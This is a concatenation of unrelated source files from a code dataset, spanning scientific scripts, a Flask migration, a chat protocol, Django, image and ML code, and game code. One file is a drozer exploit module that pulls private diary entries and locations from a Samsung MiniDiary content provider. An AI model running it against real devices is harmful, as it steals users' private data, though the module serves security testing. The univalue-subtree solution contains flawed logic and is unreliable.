"mfalme2030@gmail.com"
] | mfalme2030@gmail.com |
50d9bcb586a1faed7b58e48723a78679a98837d8 | 279ed7207ac2c407487416b595e12f573049dd72 | /pybvk/apps/bvkdos.py | 13cba733f4b05f59814d552d8b8aa8f9f4c231a3 | [] | no_license | danse-inelastic/pybvk | 30388455e211fec69130930f2925fe16abe455bd | 922c8c0a8c50a9fabd619fa06e005cacc2d13a15 | refs/heads/master | 2016-09-15T22:21:13.131688 | 2014-06-25T17:12:34 | 2014-06-25T17:12:34 | 34,995,254 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,211 | py | #!/usr/bin/env python
# given the python module to create "system", calculate dos
# the python module is optional. if it is not given, then "system" file must exist already.
import os
def run(systempy, system, df, N, Vecs):
    """Compute the phonon DOS for a BvK system inside a scratch directory.

    Either ``systempy`` (a script that generates the system file) or
    ``system`` (an existing file) may be given; with neither, an existing
    './system' file is assumed.  Returns whatever execute() returns for
    the 'DOS' output file.
    """
    # Default to a pre-existing "system" file when no input was supplied.
    if not systempy and not system:
        system = 'system'
    # All work happens in a throwaway temp directory.
    import tempfile
    workdir = tempfile.mkdtemp()
    # Materialise the "system" file inside the scratch directory.
    from bvk.applications.executionharness import createSystem, execute
    system = createSystem(workdir, systempy=systempy, system=system)
    # Assemble and run the bvk tool pipeline.
    Vecs = int(Vecs)
    commands = ['bvkrandomQs %s' % N,
                'bvkdisps %s' % Vecs,
                'bvkpartialdos %s %s' % (Vecs, df)]
    return execute(commands, workdir=workdir, outputfiles=['DOS'])
from optparse import OptionParser
def main():
    """Parse command-line options and run the DOS calculation via run()."""
    usage = "usage: %prog [options] [system]"
    parser = OptionParser(usage)
    parser.add_option(
        "-N", "--N-kpts-1D", dest="N",
        default = 10,
        help="Number of k points in 1D for sampling reciprocal space",
        )
    parser.add_option(
        "-d", "--df", dest="df",
        default = 0.1,
        help="frequency axis bin size(THz)",
        )
    # NOTE(review): this option takes a *value* (no action="store_true"),
    # so any supplied string -- including "False" or "0" -- becomes truthy
    # after bool() below.  Confirm whether store_true was intended.
    parser.add_option(
        "-E", "--compute-eigen-vectors",
        default = False,
        help='compute eigne vectors or not?',
        dest="Vecs",
        )
    parser.add_option(
        '-P', '--system-python-file',
        default = '',
        help = 'python file that generates the "system" file when executed. when this option is supplied, please do not specify the "system" file path as the argument',
        dest = 'systempy',
        )
    (options, args) = parser.parse_args()
    if len(args) > 1:
        parser.error("incorrect number of arguments")
    if len(args) == 1:
        system = args[0]
    else:
        system = None
    N = int(options.N)
    df = float(options.df)
    Vecs= bool(options.Vecs)
    systempy = options.systempy
    return run(systempy, system, df, N, Vecs)
# Script entry point: parse options and compute the DOS.
if __name__ == "__main__":
    main()
| [
"linjiao@caltech.edu"
] | linjiao@caltech.edu |
c2fdd9630eb7926aa146154e2e47cdea62cb82b4 | 89bfd26dc9cc8eb90adbb6bfc9aef0fa34705e9c | /migrations/versions/9baecab3227c_.py | 5421ebdbd8b81b4858ef5887505a52f2b0fc3a81 | [] | no_license | MaksTresh/forum-flask | c1d2d4615bb18e00e55b839be23c8f8b76b30f3e | 8b0da4bc3a0ac2789fd3988118b7f680f2f69fc8 | refs/heads/master | 2021-08-18T22:51:00.681691 | 2020-04-15T09:03:50 | 2020-04-15T09:03:50 | 162,621,034 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,169 | py | """empty message
Revision ID: 9baecab3227c
Revises: 54bd0f7227e0
Create Date: 2018-11-18 20:07:44.124918
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
# Alembic migration identifiers (auto-generated; do not edit).
revision = '9baecab3227c'
down_revision = '54bd0f7227e0'
branch_labels = None
depends_on = None
def upgrade():
    """Create the comment table and add header/rating columns to post."""
    # ### commands auto generated by Alembic - please adjust! ###
    op.create_table('comment',
    sa.Column('id', sa.Integer(), nullable=False),
    sa.Column('body', sa.String(length=1000), nullable=True),
    sa.Column('image', sa.String(length=500), nullable=True),
    sa.Column('user_id', sa.Integer(), nullable=True),
    sa.ForeignKeyConstraint(['user_id'], ['user.id'], ),
    sa.PrimaryKeyConstraint('id')
    )
    op.add_column('post', sa.Column('header', sa.String(length=30), nullable=True))
    # NOTE(review): String(1000000) is an unusually large varchar for a
    # 'rating' column -- confirm a numeric type was not intended.
    op.add_column('post', sa.Column('rating', sa.String(length=1000000), nullable=True))
    # ### end Alembic commands ###
def downgrade():
    """Reverse upgrade(): drop the post columns and the comment table."""
    # ### commands auto generated by Alembic - please adjust! ###
    op.drop_column('post', 'rating')
    op.drop_column('post', 'header')
    op.drop_table('comment')
    # ### end Alembic commands ###
| [
"mmakstresh@gmail.com"
] | mmakstresh@gmail.com |
eb9acff83caf6b18ce66a9e805bdb61b22b2f7ad | 1bbf2f808f15a1320c02498230919b8bb3b83dc3 | /Trabalho 3 - Chat completo/protocol.py | 7cc5f22e647a5961358da35889f424526128dbbd | [] | no_license | ddrc1/Redes-2 | 58b05448462d50546ce67f077b9d86b095cac11d | 9ece988e4707103ad743f29817571c16290a22f7 | refs/heads/master | 2021-03-09T23:38:29.616072 | 2020-03-13T02:29:02 | 2020-03-13T02:29:02 | 246,394,422 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,964 | py | import struct
from enum import Enum
from abc import ABC, abstractmethod
# Protocol definitions: fixed header of 1-byte version, 2-byte length and
# 1-byte type in network byte order ('!BHB'); the length field covers the
# header plus the payload (see the message classes below).
PROTOCOL_VERSION = 1
PROTOCOL_HEADER_FORMAT = '!BHB'
PROTOCOL_HEADER_LENGTH = struct.calcsize(PROTOCOL_HEADER_FORMAT)
# Message type codes
NICKNAME_MESSAGE_TYPE = 1
CHAT_MESSAGE_TYPE = 2
CLIENT_CONNECTION_TYPE = 3
CLIENT_CLOSE_CONN_TYPE = 4
def getMessageClass(msg):
    """Map a raw input line to the protocol message that represents it.

    Lines containing the "\\nickname " command become NicknameMessage,
    lines containing "\\close" become CloseMessage, everything else is a
    plain ChatMessage.
    """
    if "\\nickname " in msg:
        print("nick")
        # Bug fix: str.lstrip() strips a *set of characters*, not a prefix,
        # so it also ate leading letters of nicknames such as "anna".
        # partition() removes exactly the command marker instead.
        return NicknameMessage(msg.partition("\\nickname ")[2])
    elif "\close" in msg:
        return CloseMessage(msg.partition("\\close ")[2])
    else:
        print("mesg")
        return ChatMessage(msg)
# Abstract base class shared by every protocol message.
class BaseProtocol(ABC):
    """Common header state plus the (de)serialisation interface."""

    def __init__(self):
        # Concrete subclasses overwrite these with their real header values.
        self.version = 0
        self.length = 0
        self.type = 0

    @abstractmethod
    def get_bytes(self):
        """Serialise this message into its wire representation."""

    @staticmethod
    @abstractmethod
    def from_buffer(msg):
        """Rebuild a message object from a received byte buffer."""
# Message that registers a client's nickname.
class NicknameMessage(BaseProtocol):
    """Carries the nickname chosen by a client."""

    def __init__(self, nickname):
        super().__init__()
        self.version = PROTOCOL_VERSION
        self.type = NICKNAME_MESSAGE_TYPE
        self.length = PROTOCOL_HEADER_LENGTH + len(nickname.encode('utf8'))
        self.nickname = nickname

    def get_bytes(self):
        payload = self.nickname.encode('utf8')
        fmt = f'{PROTOCOL_HEADER_FORMAT}{len(payload)}s'
        return struct.pack(fmt, self.version, self.length, self.type, payload)

    @staticmethod
    def from_buffer(msg):
        fmt = f'{PROTOCOL_HEADER_FORMAT}{len(msg) - PROTOCOL_HEADER_LENGTH}s'
        fields = struct.unpack(fmt, msg)
        return NicknameMessage(fields[3].decode('utf8'))
# Message carrying one ordinary chat line.
class ChatMessage(BaseProtocol):
    """Wraps a plain chat text in the protocol framing."""

    def __init__(self, msg):
        super().__init__()
        self.version = PROTOCOL_VERSION
        self.type = CHAT_MESSAGE_TYPE
        self.length = PROTOCOL_HEADER_LENGTH + len(msg.encode('utf8'))
        self.msg = msg

    def get_bytes(self):
        payload = self.msg.encode('utf8')
        fmt = f'{PROTOCOL_HEADER_FORMAT}{len(payload)}s'
        return struct.pack(fmt, self.version, self.length, self.type, payload)

    @staticmethod
    def from_buffer(msg):
        fmt = f'{PROTOCOL_HEADER_FORMAT}{len(msg) - PROTOCOL_HEADER_LENGTH}s'
        fields = struct.unpack(fmt, msg)
        return ChatMessage(fields[3].decode('utf8'))
class CloseMessage(BaseProtocol):
    """Announces that the client identified by ``nick`` is disconnecting."""

    def __init__(self, nick):
        super().__init__()
        self.version = PROTOCOL_VERSION
        self.type = CLIENT_CLOSE_CONN_TYPE
        # Bug fix: length used to be the bare header size, which made
        # get_bytes() pack the payload with a '0s' field and silently drop
        # the "\close <nick>" text from the wire.
        self.length = PROTOCOL_HEADER_LENGTH + len(f"\\close {nick}".encode('utf8'))
        self.nick = nick

    def get_bytes(self):
        payload = f"\\close {self.nick}".encode('utf8')
        return struct.pack(f'{PROTOCOL_HEADER_FORMAT}{len(payload)}s',
                           self.version, self.length, self.type, payload)

    @staticmethod
    def from_buffer(nick):
        # ``nick`` is the raw byte buffer here (parameter name kept for
        # interface compatibility).
        fmt = f'{PROTOCOL_HEADER_FORMAT}{len(nick) - PROTOCOL_HEADER_LENGTH}s'
        data = struct.unpack(fmt, nick)
        # Bug fix: previously returned CloseMessage(<raw buffer>); decode the
        # payload and strip the "\close " marker so the nick round-trips.
        text = data[3].decode('utf8')
        return CloseMessage(text.partition("\\close ")[2] if "\\close " in text else text)
| [
"danielrotheia@gmail.com"
] | danielrotheia@gmail.com |
9e3d7a39f03e12281ca6a9bc758c4adbf7873c01 | eee7b11df02e30b023532b73c015fd6eedef8998 | /mysite/urls.py | dadab4c98f9305a601c28ba055d1d2b9f9be6c7a | [] | no_license | soymelisa/my-first-django-blog | 679cdee3b197c24fc0e3a63f2f348eb274b826ad | cb21cadd9177810dfd695183a33228e9a360fa6b | refs/heads/master | 2020-06-25T03:39:18.584302 | 2019-07-29T18:24:47 | 2019-07-29T18:24:47 | 199,188,053 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 821 | py | """mysite URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.urls import path, include
from django.contrib import admin
from django.urls import path
# URL routing: Django admin plus the blog app's own urlconf at the site root.
urlpatterns = [
    path('admin/', admin.site.urls),
    path('', include('blog.urls')),
]
"soymelisa@yahoo.com"
] | soymelisa@yahoo.com |
63cfbd9c8ad9930ad2a5cbaf21d054591384d6bb | 1ee963824666f3bf987d5aff861d9697ba42a78e | /app/node_modules/mongoose/node_modules/mongodb/node_modules/bson/build/config.gypi | a8a1c681f9e3233d3948a5301339c9bd917d66da | [
"Apache-2.0",
"MIT"
] | permissive | Darkninja/blog | bf03599c605ab606f8585ec5aeedf42d2d8e45a1 | cb3120f06ccf745692aec37fd170bf81ba34cc77 | refs/heads/master | 2021-01-18T08:41:42.125237 | 2013-03-13T10:15:23 | 2013-03-13T10:15:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,737 | gypi | # Do not edit. File was generated by node-gyp's "configure" step
{
"target_defaults": {
"cflags": [],
"default_configuration": "Release",
"defines": [],
"include_dirs": [],
"libraries": []
},
"variables": {
"clang": 0,
"gcc_version": 46,
"host_arch": "x64",
"node_install_npm": "false",
"node_install_waf": "true",
"node_prefix": "/usr",
"node_shared_openssl": "false",
"node_shared_v8": "false",
"node_shared_zlib": "false",
"node_tag": "",
"node_unsafe_optimizations": 0,
"node_use_dtrace": "false",
"node_use_etw": "false",
"node_use_openssl": "true",
"target_arch": "x64",
"v8_no_strict_aliasing": 1,
"v8_use_snapshot": "false",
"nodedir": "/home/norder/.node-gyp/0.8.20",
"copy_dev_lib": "true",
"cache_lock_stale": "60000",
"pre": "",
"sign_git_tag": "",
"user_agent": "node/v0.8.20 linux x64",
"always_auth": "",
"bin_links": "true",
"fetch_retries": "2",
"description": "true",
"init_version": "0.0.0",
"user": "",
"force": "",
"ignore": "",
"cache_min": "10",
"editor": "vi",
"rollback": "true",
"cache_max": "null",
"userconfig": "/home/norder/.npmrc",
"init_author_url": "",
"yes": "",
"init_author_name": "",
"coverage": "",
"tmp": "/home/norder/tmp",
"userignorefile": "/home/norder/.npmignore",
"engine_strict": "",
"usage": "",
"depth": "null",
"save_dev": "",
"https_proxy": "",
"onload_script": "",
"rebuild_bundle": "true",
"save_bundle": "",
"shell": "/bin/bash",
"prefix": "/usr",
"registry": "https://registry.npmjs.org/",
"versions": "",
"searchopts": "",
"save_optional": "",
"cache_lock_wait": "10000",
"browser": "",
"cache": "/home/norder/.npm",
"version": "",
"searchsort": "name",
"npaturl": "http://npat.npmjs.org/",
"viewer": "man",
"color": "true",
"fetch_retry_mintimeout": "10000",
"umask": "18",
"fetch_retry_maxtimeout": "60000",
"message": "%s",
"global": "",
"link": "",
"unicode": "true",
"save": "",
"unsafe_perm": "true",
"long": "",
"production": "",
"node_version": "v0.8.20",
"tag": "latest",
"fetch_retry_factor": "10",
"username": "",
"proprietary_attribs": "true",
"npat": "",
"strict_ssl": "true",
"parseable": "",
"globalconfig": "/usr/etc/npmrc",
"init_module": "/home/norder/.npm-init.js",
"dev": "",
"globalignorefile": "/usr/etc/npmignore",
"cache_lock_retries": "10",
"init_author_email": "",
"searchexclude": "",
"group": "1000",
"optional": "true",
"git": "git",
"json": ""
}
}
| [
"me@andrewsking.com"
] | me@andrewsking.com |
5d41e4fc84e6338c49bce2a6c1a44559d4fcac24 | 809d126d0785687f20e14fd71a529dbf73dd1f5e | /store/main/routes.py | 3c637972167fc1698bd695e3862fc7b6ee1b6714 | [
"MIT"
] | permissive | isaacrivas10/fb_chatbot | 1aa129e32919167d68d71cac9895c491e73d3086 | 01a78e690e698609a5b89dc8f04c216b248f5047 | refs/heads/master | 2022-12-10T23:48:51.002548 | 2020-03-10T02:36:01 | 2020-03-10T02:36:01 | 229,897,442 | 0 | 0 | MIT | 2022-12-08T03:20:59 | 2019-12-24T07:52:05 | CSS | UTF-8 | Python | false | false | 560 | py |
from flask import Blueprint, render_template
from flask_login import current_user
# Blueprint for the site's public pages; registered by the app factory.
main= Blueprint('main', __name__)
@main.route("/")
@main.route("/home")
def home():
    """Landing page: full site for members, 'coming soon' for visitors."""
    if not current_user.is_authenticated:
        return render_template('soon.html')
    return render_template('index.html', show=True, isauth=True)
"""
@main.route("/privacy_policy", methods=['GET'])
def privacy_policy():
return render_template('privacy_policy.html', title='Privacy Policy')
"""
@main.route('/<path:page>')
def anypage(page):
return render_template('soon.html') | [
"idrc74@hotmail.com"
] | idrc74@hotmail.com |
031ac86eb737e0cb3cf325efa6c5fc736ac1dd8d | 96721286424fa257d6b969ddd4e823e22fe2bcda | /venv/lib/python3.5/site-packages/easy_thumbnails/source_generators.py | c8969b7241ded68ee56568a0cdb623a0e48ebc29 | [
"MIT"
] | permissive | Deepanjalli/job_portal6 | 6a44482c8a3c89e8babae259a5390ec89e73e580 | 2869de5dca16a88f840ce0e4a26fe2edba3e9cae | refs/heads/master | 2021-09-10T09:00:21.791857 | 2020-02-24T07:13:04 | 2020-02-24T07:13:04 | 242,659,782 | 0 | 0 | MIT | 2021-09-08T01:50:58 | 2020-02-24T06:08:25 | Python | UTF-8 | Python | false | false | 1,057 | py | from io import BytesIO
from PIL import Image, ImageFile
from easy_thumbnails import utils
def pil_image(source, exif_orientation=True, **options):
    """
    Try to open the source file directly using PIL, ignoring any errors.

    exif_orientation

        If EXIF orientation data is present, perform any required reorientation
        before passing the data along the processing pipeline.
    """
    # Use a BytesIO wrapper because if the source is an incomplete file like
    # object, PIL may have problems with it. For example, some image types
    # require tell and seek methods that are not present on all storage
    # File objects.
    if not source:
        return
    source = BytesIO(source.read())
    image = Image.open(source)
    # Fully load the image now to catch any problems with the image contents.
    previous_setting = ImageFile.LOAD_TRUNCATED_IMAGES
    ImageFile.LOAD_TRUNCATED_IMAGES = True
    try:
        image.load()
    finally:
        # Bug fix: restore whatever the flag was before, rather than forcing
        # it back to False and clobbering a setting other code may rely on.
        ImageFile.LOAD_TRUNCATED_IMAGES = previous_setting
    if exif_orientation:
        image = utils.exif_orientation(image)
    return image
| [
"deepz9733@gmail.com"
] | deepz9733@gmail.com |
a7fb3e98a1693472240d1701c60eabe016e852f8 | 44b7bdb64f90d5d6628ffa81e4fcccdaac8aad51 | /metall0id/pilfer/samsung/gsii/minidiary.py | 39e15def420aad692f2c96a8e6a5edf1df2e46c9 | [] | no_license | LogicalTrust/drozer-modules | 65005ac30d860693e178bba81eeb00075755f2f8 | d39fceba96f7f885c015ab79c6d3dd7cd1d9e8b9 | refs/heads/master | 2021-01-01T19:40:47.371947 | 2018-03-10T08:35:43 | 2018-03-10T08:35:43 | 98,646,524 | 2 | 0 | null | 2017-08-02T07:37:56 | 2017-07-28T12:15:50 | Python | UTF-8 | Python | false | false | 1,220 | py | from drozer.modules import common, Module
class MiniDiary(Module, common.Provider, common.TableFormatter, common.Vulnerability):
    name = "Tests for Content Provider vulnerability in com.sec.android.app.minidiary."
    description = "Tests for Content Provider vulnerability in com.sec.android.app.minidiary."
    examples = ""
    author = "Tyrone (@mwrlabs)"
    date = "2012-11-06"
    license = "BSD (3 clause)"
    path = ["exploit", "pilfer", "oem", "samsung"]
    permissions = ["com.mwr.dz.permissions.GET_CONTEXT"]
    label = "Note entries from MiniDiary (com.sec.android.app.minidiary)"

    def exploit(self, arguments):
        """Dump every diary row the provider exposes, or report failure."""
        cursor = self.getCursor()
        if cursor == None:
            self.stdout.write("Unknown Error.\n")
            return
        self.print_table(self.getResultSet(cursor), show_headers=True)

    def getCursor(self):
        """Query the MiniDiary content provider for all diary entries."""
        columns = ["_id", "location", "date", "longitude", "latitude", "picture_file", "note"]
        return self.contentResolver().query("content://com.sec.android.providers.minidiary.MiniDiaryData/diary", projection=columns)

    def isVulnerable(self, arguments):
        """Vulnerable when the provider is queryable and returns rows."""
        cursor = self.getCursor()
        return cursor != None and cursor.getCount() > 0
| [
"daniel.bradberry@mwrinfosecurity.com"
] | daniel.bradberry@mwrinfosecurity.com |
35c2f0858f1e0b8ebe8a568c171b19c24fd7c125 | 8111fe5c304b7d0c9c3c8eba5813cf380db7f29e | /test7.py | 6ff5bf46c16cde9a6b65f64619530596eb5f2648 | [] | no_license | poonamsl/JenkinsTests | 2c978689bdcdc728fe672245483498526af675a2 | 2432c5cea356908d7ed4b5ba2f672a28d43d0532 | refs/heads/master | 2023-05-02T16:11:20.660451 | 2023-04-24T20:57:33 | 2023-04-24T20:57:33 | 61,320,225 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,433 | py | from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
#import sauceclient
import os
import json
# Retrieving environment variables
SAUCE_USERNAME = os.environ.get('SAUCE_USERNAME')
SAUCE_ACCESS_KEY = os.environ.get('SAUCE_ACCESS_KEY')
#sauce_client = SauceClient(SAUCE_USERNAME,SAUCE_ACCESS_KEY)
myUrl = 'http://' + SAUCE_USERNAME + ':' + SAUCE_ACCESS_KEY + '@ondemand.saucelabs.com:80/wd/hub';
SauceOnDemandBrowsers_String = os.environ.get('SAUCE_ONDEMAND_BROWSERS')
print "Build name is " + os.environ.get('JENKINS_BUILD_NUMBER')
parsed_json = json.loads(SauceOnDemandBrowsers_String)
num = len(parsed_json)
for i in range(num):
currentCaps = parsed_json[i]
# The command_executor tells the test to run on Sauce, while the desired_capabilitues
# parameter tells us which browsers and OS to spin up
desired_cap = {
'platform': currentCaps['os'],
'browserName': currentCaps['browser'],
'version': currentCaps['browser-version'],
'name':'test7',
'public':'public',
'build':os.environ.get('JENKINS_BUILD_NUMBER')
}
driver = webdriver.Remote(command_executor=myUrl,desired_capabilities=desired_cap)
driver.get("http://www.google.com")
print desired_cap
print "SauceOnDemandSessionID=" + driver.session_id + " job-name=test7"
driver.quit()
#sauce_client.jobs.update_job(driver.session_id, passed=True)
| [
"noreply@github.com"
] | noreply@github.com |
25069dd9e77118a997038dcb2d699948baacf6b6 | d38d988114f8487e4c0d1674191b6f2865eac70d | /gru.py | 7b20014606ce44db1d77d34a341bc6b2b10aa40b | [
"MIT"
] | permissive | dizcza/ujipen | 71cc1612fcc8247a7cae1a2da9ea13cb2fca38e8 | 4e7d2ff1bd6d659743fdf68e49894236cd559b84 | refs/heads/master | 2021-07-05T19:03:00.701898 | 2020-09-11T18:48:57 | 2020-09-11T18:48:57 | 171,858,288 | 1 | 1 | MIT | 2019-10-30T09:28:42 | 2019-02-21T11:19:50 | Python | UTF-8 | Python | false | false | 2,371 | py | from typing import List, Dict
import numpy as np
from keras import layers, models
from constants import *
from helper import check_unique_patterns
from preprocess import equally_spaced_points_patterns, is_inside_box
from ujipen.ujipen_class import UJIPen
def concat_samples(samples: Dict[str, List[List[np.ndarray]]]):
labels = []
data = []
for letter in samples.keys():
letter_ord = ord(letter) - ord('a')
labels.extend([letter_ord] * len(samples[letter]))
for word_sample in samples[letter]:
word_sample = np.vstack(word_sample)
data.append(word_sample)
data = np.stack(data, axis=0)
assert is_inside_box(data, box=((-1, -1), (1, 1)))
labels = np.array(labels)
print(f"Data: {data.shape}, labels: {labels.shape}")
return data, labels
def train(ujipen: UJIPen, n_input=PATTERN_SIZE, n_hidden=50):
patterns = ujipen.get_samples(fold='train')
patterns = equally_spaced_points_patterns(patterns, total_points=n_input)
train_data, train_labels = concat_samples(patterns)
test_samples = equally_spaced_points_patterns(ujipen.get_samples(fold='test'), total_points=n_input)
test_data, test_labels = concat_samples(test_samples)
assert check_unique_patterns(patterns, n_points=n_input)
gru = models.Sequential()
gru.add(layers.GRU(units=n_hidden, activation='tanh', recurrent_activation='hard_sigmoid',
return_sequences=False, implementation=1,
input_shape=(n_input, 2)))
gru.add(layers.Dense(units=np.unique(train_labels).size, activation='softmax'))
print(gru.summary())
gru.compile(optimizer='adam', loss='sparse_categorical_crossentropy', metrics=['accuracy'])
history = gru.fit(train_data, train_labels, epochs=100, batch_size=32, validation_data=(test_data, test_labels),
verbose=0)
history = history.history
accuracy_train = history['acc'][-1]
print(f"Loss: {history['loss'][-1]:.5f}, accuracy: train={accuracy_train:.5f}, val={history['val_acc'][-1]:.5f}")
MODELS_DIR.mkdir(exist_ok=True)
model_path = str(MODELS_DIR / f'GRU_input-{n_input}_hidden-{n_hidden}_acc-{accuracy_train:.4f}.h5')
gru.save(model_path)
print(f"Saved trained model to {model_path}")
if __name__ == '__main__':
train(ujipen=UJIPen(), n_input=30, n_hidden=100)
| [
"dizcza@gmail.com"
] | dizcza@gmail.com |
c5938159509a69c4d911d0b67d9fe2ccb67844f4 | 70b339d0b2638a7914d0d56c5edf8a2637c9f4b0 | /countUnivalSubtrees.py | debb8570ebae08b08bd35f2a07e56136d4acbf9a | [] | no_license | pflun/advancedAlgorithms | 9991da7514024e18ba08de8688966b9220e12571 | 5520dbcd26999b98e1229bf03c2f62dd690a2ddc | refs/heads/master | 2023-02-19T12:05:26.902535 | 2023-02-14T06:08:54 | 2023-02-14T06:08:54 | 189,055,701 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,234 | py | # -*- coding: utf-8 -*-
# 分别看左右子树返回值是否与根相等,分情况讨论
# https://mnmunknown.gitbooks.io/algorithm-notes/content/61_tree.html
# Definition for a binary tree node.
class TreeNode(object):
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution(object):
def countUnivalSubtrees(self, root):
self.res = 0
def postorder(root):
if root is None:
return None
# 叶子节点也算一个子树
if root.left is None and root.right is None:
self.res += 1
return root.val
if root.left:
left = postorder(root.left)
if root.right:
right = postorder(root.right)
# 左右子树都存在
if root.left and root.right:
# 左右儿子和根值相等
if left == right:
if left is root.val:
self.res += 1
else:
return False
else:
# 左儿子和根相等
if left == root.val:
self.res += 1
# 或者右儿子和根相等
elif right == root.val:
self.res += 1
# 只存在左子树
elif root.left and not root.right:
# 左儿子和根相等
if left == root.val:
self.res += 1
else:
return False
elif root.right and not root.left:
if right == root.val:
self.res += 1
else:
return False
return root.val
postorder(root)
return self.res
head_node = TreeNode(0)
n1 = TreeNode(1)
n2 = TreeNode(0)
n3 = TreeNode(5)
n4 = TreeNode(4)
n5 = TreeNode(5)
n6 = TreeNode(5)
n7 = TreeNode(5)
head_node.left = n1
head_node.right = n2
n1.left = n3
n1.right = n4
n3.left = n6
n6.left = n5
n6.right = n7
test1 = Solution()
print test1.countUnivalSubtrees(head_node)
# 0
# 1 0
# 5 4
# 5
#5 5 | [
"zgao@gwu.edu"
] | zgao@gwu.edu |
7b731c6f011fa87393d4ce9b59e7a664722cbc56 | 30150c7f6ed7a10ac50eee3f40101bc3165ebf9e | /src/coghq/FactoryEntityCreatorAI.py | f46ac38d6fdd0fa9403d61345de5892119f286e3 | [] | no_license | toontown-restoration-project/toontown | c2ad0d552cb9d5d3232ae6941e28f00c11ca3aa8 | 9bef6d9f823b2c12a176b33518eaa51ddbe3fd2f | refs/heads/master | 2022-12-23T19:46:16.697036 | 2020-10-02T20:17:09 | 2020-10-02T20:17:09 | 300,672,330 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,100 | py | """FactoryEntityCreatorAI module: contains the FactoryEntityCreatorAI class"""
from otp.level import EntityCreatorAI
from direct.showbase.PythonUtil import Functor
from . import DistributedBeanBarrelAI
from . import DistributedButtonAI
from . import DistributedCrateAI
from . import DistributedLiftAI
from . import DistributedDoorEntityAI
from . import DistributedGagBarrelAI
from . import DistributedGridAI
from toontown.suit import DistributedGridGoonAI
from toontown.suit import DistributedGoonAI
from . import DistributedHealBarrelAI
from . import DistributedStomperPairAI
from . import DistributedTriggerAI
from . import DistributedStomperAI
from . import DistributedLaserFieldAI
from . import DistributedSecurityCameraAI
from . import DistributedMoverAI
from . import DistributedElevatorMarkerAI
from . import DistributedSinkingPlatformAI
from . import ActiveCellAI
from . import CrusherCellAI
from . import DirectionalCellAI
from . import FactoryLevelMgrAI
from . import BattleBlockerAI
from . import DistributedGolfGreenGameAI
from toontown.coghq import DistributedMoleFieldAI
from toontown.coghq import DistributedMazeAI
class FactoryEntityCreatorAI(EntityCreatorAI.EntityCreatorAI):
def __init__(self, level):
EntityCreatorAI.EntityCreatorAI.__init__(self, level)
# create short aliases for EntityCreatorAI create funcs
cDE = EntityCreatorAI.createDistributedEntity
cLE = EntityCreatorAI.createLocalEntity
nothing = EntityCreatorAI.nothing
self.privRegisterTypes({
'activeCell' : Functor(cDE, ActiveCellAI.ActiveCellAI),
'crusherCell' : Functor(cDE, CrusherCellAI.CrusherCellAI),
'battleBlocker' : Functor(cDE, BattleBlockerAI.BattleBlockerAI),
'beanBarrel': Functor(cDE, DistributedBeanBarrelAI.DistributedBeanBarrelAI),
'button': DistributedButtonAI.DistributedButtonAI,
'conveyorBelt' : nothing,
'crate': Functor(cDE, DistributedCrateAI.DistributedCrateAI),
'directionalCell' : Functor(cDE, DirectionalCellAI.DirectionalCellAI),
'door': DistributedDoorEntityAI.DistributedDoorEntityAI,
'gagBarrel': Functor(cDE, DistributedGagBarrelAI.DistributedGagBarrelAI),
'gear': nothing,
'goon': Functor(cDE, DistributedGoonAI.DistributedGoonAI),
'gridGoon': Functor(cDE, DistributedGridGoonAI.DistributedGridGoonAI),
'golfGreenGame': Functor(cDE, DistributedGolfGreenGameAI.DistributedGolfGreenGameAI),
'goonClipPlane' : nothing,
'grid': Functor(cDE, DistributedGridAI.DistributedGridAI),
'healBarrel': Functor(cDE, DistributedHealBarrelAI.DistributedHealBarrelAI),
'levelMgr': Functor(cLE, FactoryLevelMgrAI.FactoryLevelMgrAI),
'lift': Functor(cDE, DistributedLiftAI.DistributedLiftAI),
'mintProduct': nothing,
'mintProductPallet': nothing,
'mintShelf': nothing,
'mover': Functor(cDE, DistributedMoverAI.DistributedMoverAI),
'paintMixer': nothing,
'pathMaster': nothing,
'rendering': nothing,
'platform': nothing,
'sinkingPlatform': Functor(cDE, DistributedSinkingPlatformAI.DistributedSinkingPlatformAI),
'stomper': Functor(cDE, DistributedStomperAI.DistributedStomperAI),
'stomperPair': Functor(cDE, DistributedStomperPairAI.DistributedStomperPairAI),
'laserField': Functor(cDE, DistributedLaserFieldAI.DistributedLaserFieldAI),
'securityCamera': Functor(cDE, DistributedSecurityCameraAI.DistributedSecurityCameraAI),
'elevatorMarker': Functor(cDE, DistributedElevatorMarkerAI.DistributedElevatorMarkerAI),
#'laserField': Functor(cDE, DistributedStomperAI.DistributedStomperAI),
'trigger': DistributedTriggerAI.DistributedTriggerAI,
'moleField': Functor(cDE, DistributedMoleFieldAI.DistributedMoleFieldAI),
'maze': Functor(cDE, DistributedMazeAI.DistributedMazeAI),
})
| [
"brianlach72@gmail.com"
] | brianlach72@gmail.com |
81e3fd66b95ae9164e10826cf96b469c11dc802c | 69885b865879678a1b70214bf1a0c7c742eb989d | /Vehicles_detection/tiny_YOLO/tiny_train.py | 579e8dd6bdf55cc81f5da5471b0958f331553506 | [] | no_license | Key1994/Course_of_self-driving_car_Udacity | 5c794811845007dca424dac70dce2c56fb475f38 | 83e34a68a9a4fb21cb9e8d738770c203780a845e | refs/heads/master | 2022-12-08T05:23:10.225984 | 2020-09-04T06:31:39 | 2020-09-04T06:31:39 | 291,411,688 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,377 | py |
import numpy as np
import keras.backend as K
from keras.layers import Input, Lambda
from keras.models import Model
from keras.callbacks import TensorBoard, ModelCheckpoint
